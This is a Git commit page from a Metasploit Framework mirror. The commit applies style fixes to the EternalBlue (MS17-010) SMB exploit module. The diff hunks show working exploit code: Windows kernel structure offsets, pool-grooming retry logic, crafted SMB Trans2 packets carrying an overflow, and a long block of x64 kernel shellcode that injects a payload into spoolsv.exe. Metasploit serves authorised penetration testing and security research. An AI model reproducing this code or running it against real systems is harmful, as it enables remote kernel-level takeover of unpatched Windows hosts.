infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Stop some of the rubocop carnage

GSoC/Meterpreter_Web_Console
bwatters-r7 2018-11-05 14:11:24 -06:00
parent 5ec155fd44
commit 4f2ba46125
No known key found for this signature in database
GPG Key ID: ECC0F0A52E65F268
1 changed files with 47 additions and 49 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

96
modules/exploits/windows/smb/ms17_010_eternalblue.rb
View File

@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
'Name' => 'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption', 'Name' => 'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption',
'Description' => %q{ 'Description' => %q(
This module is a port of the Equation Group ETERNALBLUE exploit, part of This module is a port of the Equation Group ETERNALBLUE exploit, part of
the FuzzBunch toolkit released by Shadow Brokers. the FuzzBunch toolkit released by Shadow Brokers.
@ -35,78 +35,81 @@ class MetasploitModule < Msf::Exploit::Remote
On some systems, this module may cause system instability and crashes, such as a BSOD or On some systems, this module may cause system instability and crashes, such as a BSOD or
a reboot. This may be more likely with some payloads. a reboot. This may be more likely with some payloads.
}, ),
'Author' => [ 'Author' =>
[
'Sean Dillon <sean.dillon@risksense.com>', # @zerosum0x0 'Sean Dillon <sean.dillon@risksense.com>', # @zerosum0x0
'Dylan Davis <dylan.davis@risksense.com>', # @jennamagius 'Dylan Davis <dylan.davis@risksense.com>', # @jennamagius
'Equation Group', 'Equation Group',
'Shadow Brokers', 'Shadow Brokers',
'thelightcosine' # RubySMB refactor and Fallback Credential mode 'thelightcosine' # RubySMB refactor and Fallback Credential mode
], ],
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'References' => 'References' =>
[ [
[ 'MSB', 'MS17-010' ], ['MSB', 'MS17-010'],
[ 'CVE', '2017-0143' ], ['CVE', '2017-0143'],
[ 'CVE', '2017-0144' ], ['CVE', '2017-0144'],
[ 'CVE', '2017-0145' ], ['CVE', '2017-0145'],
[ 'CVE', '2017-0146' ], ['CVE', '2017-0146'],
[ 'CVE', '2017-0147' ], ['CVE', '2017-0147'],
[ 'CVE', '2017-0148' ], ['CVE', '2017-0148'],
[ 'URL', 'https://github.com/RiskSense-Ops/MS17-010' ] ['URL', 'https://github.com/RiskSense-Ops/MS17-010']
], ],
'DefaultOptions' => 'DefaultOptions' =>
{ {
'EXITFUNC' => 'thread', 'EXITFUNC' => 'thread',
'WfsDelay' => 5, 'WfsDelay' => 5
}, },
'Privileged' => true, 'Privileged' => true,
'Payload' => 'Payload' =>
{ {
'Space' => 2000, # this can be more, needs to be recalculated 'Space' => 2000, # this can be more, needs to be recalculated
'EncoderType' => Msf::Encoder::Type::Raw, 'EncoderType' => Msf::Encoder::Type::Raw
}, },
'Platform' => 'win', 'Platform' => 'win',
'Targets' => 'Targets' =>
[ [
[ 'Windows 7 and Server 2008 R2 (x64) All Service Packs', [
'Windows 7 and Server 2008 R2 (x64) All Service Packs',
{ {
'Platform' => 'win', 'Platform' => 'win',
'Arch' => [ ARCH_X64 ], 'Arch' => [ARCH_X64],
'os_patterns' => ['Server 2008 R2', 'Windows 7', 'Windows Embedded Standard 7'], 'os_patterns' => ['Server 2008 R2', 'Windows 7', 'Windows Embedded Standard 7'],
'ep_thl_b' => 0x308, # EPROCESS.ThreadListHead.Blink offset 'ep_thl_b' => 0x308, # EPROCESS.ThreadListHead.Blink offset
'et_alertable' => 0x4c, # ETHREAD.Alertable offset 'et_alertable' => 0x4c, # ETHREAD.Alertable offset
'teb_acp' => 0x2c8, # TEB.ActivationContextPointer offset 'teb_acp' => 0x2c8, # TEB.ActivationContextPointer offset
'et_tle' => 0x420 # ETHREAD.ThreadListEntry offset 'et_tle' => 0x420 # ETHREAD.ThreadListEntry offset
} }
], ]
], ],
'DefaultTarget' => 0, 'DefaultTarget' => 0,
'DisclosureDate' => 'Mar 14 2017', 'DisclosureDate' => 'Mar 14 2017',
'Notes' => 'Notes' =>
{ {
'AKA' => ['ETERNALBLUE'] 'AKA' => ['ETERNALBLUE']
} }
)) ))
register_options( register_options(
[ [
Opt::RPORT(445), Opt::RPORT(445),
OptBool.new( 'VERIFY_TARGET', [ true, "Check if remote OS matches exploit Target.", true ] ), OptBool.new('VERIFY_TARGET', [true, "Check if remote OS matches exploit Target.", true]),
OptBool.new( 'VERIFY_ARCH', [ true, "Check if remote architecture matches exploit Target.", true ] ), OptBool.new('VERIFY_ARCH', [true, "Check if remote architecture matches exploit Target.", true]),
OptString.new('SMBUser', [ false, '(Optional) The username to authenticate as', '']), OptString.new('SMBUser', [false, '(Optional) The username to authenticate as', '']),
OptString.new('SMBPass', [ false, '(Optional) The password for the specified username', '']), OptString.new('SMBPass', [false, '(Optional) The password for the specified username', '']),
OptString.new('SMBDomain', [ false, '(Optional) The Windows domain to use for authentication', '.']), OptString.new('SMBDomain', [false, '(Optional) The Windows domain to use for authentication', '.'])
]) ]
)
register_advanced_options( register_advanced_options(
[ [
OptString.new('ProcessName', [ true, 'Process to inject payload into.', 'spoolsv.exe' ]), OptString.new('ProcessName', [true, 'Process to inject payload into.', 'spoolsv.exe']),
OptInt.new( 'MaxExploitAttempts', [ true, "The number of times to retry the exploit.", 3 ] ), OptInt.new('MaxExploitAttempts', [true, "The number of times to retry the exploit.", 3]),
OptInt.new( 'GroomAllocations', [ true, "Initial number of times to groom the kernel pool.", 12 ] ), OptInt.new('GroomAllocations', [true, "Initial number of times to groom the kernel pool.", 12]),
OptInt.new( 'GroomDelta', [ true, "The amount to increase the groom count by per try.", 5 ] ), OptInt.new('GroomDelta', [true, "The amount to increase the groom count by per try.", 5])
]) ]
)
end end
@ -118,9 +121,7 @@ class MetasploitModule < Msf::Exploit::Remote
def exploit def exploit
begin begin
for i in 1..datastore['MaxExploitAttempts'] for i in 1..datastore['MaxExploitAttempts']
grooms = datastore['GroomAllocations'] + datastore['GroomDelta'] * (i - 1) grooms = datastore['GroomAllocations'] + datastore['GroomDelta'] * (i - 1)
smb_eternalblue(datastore['ProcessName'], grooms) smb_eternalblue(datastore['ProcessName'], grooms)
# we don't need this sleep, and need to find a way to remove it # we don't need this sleep, and need to find a way to remove it
@ -462,7 +463,7 @@ class MetasploitModule < Msf::Exploit::Remote
timeout_value = "\x35\x00\xd0" + timeout.chr timeout_value = "\x35\x00\xd0" + timeout.chr
packet = RubySMB::SMB1::Packet::Trans2::Request.new packet = RubySMB::SMB1::Packet::Trans2::Request.new
packet = set_smb1_headers(packet,tree_id,user_id) packet = set_smb1_headers(packet, tree_id, user_id)
# The packets are labeled as Secondary Requests but are actually structured # The packets are labeled as Secondary Requests but are actually structured
# as normal Trans2 Requests for some reason. We shall similarly cheat here. # as normal Trans2 Requests for some reason. We shall similarly cheat here.
@ -486,7 +487,7 @@ class MetasploitModule < Msf::Exploit::Remote
pkt << "\x41" * 2957 pkt << "\x41" * 2957
pkt << "\x80\x00\xa8\x00" # overflow pkt << "\x80\x00\xa8\x00" # overflow
pkt << "\x00" * 0x10 pkt << "\x00" * 0x10
pkt << "\xff\xff" pkt << "\xff\xff"
@ -494,7 +495,7 @@ class MetasploitModule < Msf::Exploit::Remote
pkt << "\xff\xff" pkt << "\xff\xff"
pkt << "\x00" * 0x16 pkt << "\x00" * 0x16
pkt << "\x00\xf1\xdf\xff" # x86 addresses pkt << "\x00\xf1\xdf\xff" # x86 addresses
pkt << "\x00" * 0x8 pkt << "\x00" * 0x8
pkt << "\x20\xf0\xdf\xff" pkt << "\x20\xf0\xdf\xff"
@ -539,7 +540,7 @@ class MetasploitModule < Msf::Exploit::Remote
# our values here. # our values here.
packet.data_block.enable_padding = false packet.data_block.enable_padding = false
packet = set_smb1_headers(packet,tree_id,user_id) packet = set_smb1_headers(packet, tree_id, user_id)
packet.parameter_block.max_setup_count = 1 packet.parameter_block.max_setup_count = 1
packet.parameter_block.total_parameter_count = 30 packet.parameter_block.total_parameter_count = 30
@ -555,7 +556,7 @@ class MetasploitModule < Msf::Exploit::Remote
packet.parameter_block.setup << 0x0000 packet.parameter_block.setup << 0x0000
packet.data_block.byte_count = 1004 packet.data_block.byte_count = 1004
packet.data_block.trans2_parameters = "\x00" * 31 + "\x01" + ( "\x00" * 973 ) packet.data_block.trans2_parameters = "\x00" * 31 + "\x01" + ("\x00" * 973)
packet packet
end end
@ -602,15 +603,14 @@ class MetasploitModule < Msf::Exploit::Remote
end end
def ror(dword, bits) def ror(dword, bits)
( dword >> bits | dword << ( 32 - bits ) ) & 0xFFFFFFFF (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF
end end
def make_kernel_shellcode(proc_name) def make_kernel_shellcode(proc_name)
# see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm
# Length: 1019 bytes # Length: 1019 bytes
#"\xcc"+ # "\xcc"+
"\x31\xC9\x41\xE2\x01\xC3\xB9\x82\x00\x00\xC0\x0F\x32\x48\xBB\xF8" + "\x31\xC9\x41\xE2\x01\xC3\xB9\x82\x00\x00\xC0\x0F\x32\x48\xBB\xF8" +
"\x0F\xD0\xFF\xFF\xFF\xFF\xFF\x89\x53\x04\x89\x03\x48\x8D\x05\x0A" + "\x0F\xD0\xFF\xFF\xFF\xFF\xFF\x89\x53\x04\x89\x03\x48\x8D\x05\x0A" +
"\x00\x00\x00\x48\x89\xC2\x48\xC1\xEA\x20\x0F\x30\xC3\x0F\x01\xF8" + "\x00\x00\x00\x48\x89\xC2\x48\xC1\xEA\x20\x0F\x30\xC3\x0F\x01\xF8" +
@ -675,14 +675,13 @@ class MetasploitModule < Msf::Exploit::Remote
"\xFF\x31\xC9\x51\x51\x51\x51\x41\x59\x4C\x8D\x05\x1A\x00\x00\x00" + "\xFF\x31\xC9\x51\x51\x51\x51\x41\x59\x4C\x8D\x05\x1A\x00\x00\x00" +
"\x5A\x48\x83\xEC\x20\x41\xBB\x46\x45\x1B\x22\xE8\x68\xFF\xFF\xFF" + "\x5A\x48\x83\xEC\x20\x41\xBB\x46\x45\x1B\x22\xE8\x68\xFF\xFF\xFF" +
"\x48\x89\xEC\x5D\x41\x5F\x5E\xC3"#\x01\x00\xC3" "\x48\x89\xEC\x5D\x41\x5F\x5E\xC3"#\x01\x00\xC3"
end end
# Sets common SMB1 Header values used by the various # Sets common SMB1 Header values used by the various
# packets in the exploit. # packets in the exploit.
# #
# @return [RubySMB::GenericPacket] the modified version of the packet # @return [RubySMB::GenericPacket] the modified version of the packet
def set_smb1_headers(packet,tree_id,user_id) def set_smb1_headers(packet, tree_id, user_id)
packet.smb_header.flags2.read("\x07\xc0") packet.smb_header.flags2.read("\x07\xc0")
packet.smb_header.tid = tree_id packet.smb_header.tid = tree_id
packet.smb_header.uid = user_id packet.smb_header.uid = user_id
@ -691,7 +690,6 @@ class MetasploitModule < Msf::Exploit::Remote
packet packet
end end
# Returns the value to be passed to SMB clients for # Returns the value to be passed to SMB clients for
# the password. If the user has not supplied a password # the password. If the user has not supplied a password
# it returns an empty string to trigger an anonymous # it returns an empty string to trigger an anonymous